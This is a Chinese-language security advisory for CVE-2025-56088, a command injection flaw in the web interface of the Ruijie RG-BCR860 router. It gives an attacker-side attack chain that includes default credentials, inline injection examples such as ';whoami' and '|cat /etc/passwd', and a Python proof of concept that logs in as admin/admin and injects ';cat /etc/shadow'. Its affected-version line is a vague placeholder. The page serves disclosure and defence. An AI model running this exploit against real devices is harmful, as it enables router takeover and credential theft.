CVE-2025-56088 锐捷RG-BCR RG-BCR860命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56088

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-BCR RG-BCR860

漏洞概述

CVE-2025-56088是锐捷网络公司生产的RG-BCR系列路由器中存在的一个严重的操作系统命令注入漏洞。该漏洞位于设备的Web管理界面，具体在/usr/lib/lua/luci/controller/admin/service.lua文件中的action_service处理函数。攻击者可以通过构造恶意的POST请求，在未经充分验证的情况下将用户输入拼接到系统命令中执行。由于该漏洞的CVSS评分高达8.8，属于高危漏洞，具有网络访问权限的低权限攻击者即可利用此漏洞在受影响的设备上执行任意系统命令，从而完全控制路由器设备。攻击成功后，攻击者可以窃取网络流量、植入后门、进行横向移动等恶意操作，对网络基础设施安全构成严重威胁。

技术细节

该漏洞属于经典的OS命令注入漏洞，存在于锐捷RG-BCR RG-BCR860路由器的Web管理接口中。漏洞产生的根本原因是在处理action_service请求时，应用程序将用户可控的输入参数直接传递给系统命令执行函数，而没有对输入进行充分的过滤和验证。

具体利用方式：攻击者需要首先获取设备的低权限账户（任何具有Web管理访问权限的账户即可），然后构造包含恶意命令的POST请求。请求目标为管理接口的action_service端点，通过在参数中注入分号、管道符等命令分隔符，后接待执行的系统命令。例如，可以注入类似';whoami'或'|cat /etc/passwd'的命令payload。

由于设备运行的是嵌入式Linux系统，命令注入成功后将返回命令执行结果。攻击者可以利用此漏洞以root权限执行任意命令，因为Web服务通常以root权限运行。这意味着攻击者可以完全控制设备，包括读取敏感配置信息、修改路由表、安装持久化后门等。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标设备为锐捷RG-BCR RG-BCR860路由器，并确认Web管理界面可访问（默认端口80/443）

STEP 2

步骤2: 获取低权限账户

攻击者使用默认凭证或通过其他方式获取设备的低权限Web管理账户（PR:L要求）

STEP 3

步骤3: 构造恶意请求

攻击者构造包含命令注入payload的POST请求，目标是/admin/service/action_service端点，利用分号或管道符注入系统命令

STEP 4

步骤4: 命令执行

恶意请求被服务器处理，用户输入被拼接到系统命令中执行，以root权限运行，成功执行任意命令

STEP 5

步骤5: 持久化控制

攻击者可以安装后门、窃取敏感信息、修改网络配置或横向移动到内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56088 PoC - Ruijie RG-BCR RG-BCR860 OS Command Injection
# Target: Ruijie RG-BCR RG-BCR860
# Vulnerability: OS Command Injection in action_service endpoint

target = "http://target-ip"  # Replace with target IP
username = "admin"  # Replace with valid credentials
password = "admin"  # Replace with valid password

session = requests.Session()

# Step 1: Login to get session cookie
login_url = f"{target}/cgi-bin/luci/admin/login"
login_data = {
    "username": username,
    "password": password
}

try:
    response = session.post(login_url, data=login_data, timeout=10)
    print(f"[+] Login response status: {response.status_code}")
    
    # Step 2: Send malicious request with command injection payload
    # Target endpoint: /usr/lib/lua/luci/controller/admin/service.lua
    exploit_url = f"{target}/cgi-bin/luci/admin/service/action_service"
    
    # Command injection payload - extract shadow file
    payload = ";cat /etc/shadow"
    exploit_data = {
        "service_cmd": payload,
        "action": "custom"
    }
    
    print(f"[*] Sending exploit payload: {payload}")
    response = session.post(exploit_url, data=exploit_data, timeout=10)
    
    print(f"[+] Exploit response status: {response.status_code}")
    print(f"[+] Response content:")
    print(response.text)
    
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
    sys.exit(1)

影响范围

Ruijie RG-BCR RG-BCR860 固件版本 <= 存在漏洞的特定版本

防御指南

临时缓解措施

立即限制RG-BCR RG-BCR860设备的Web管理界面访问，仅允许受信任的管理IP访问。建议在边界防火墙或路由器上实施访问控制策略，阻止非授权IP访问管理端口。同时关注厂商发布的安全更新，尽快应用安全补丁。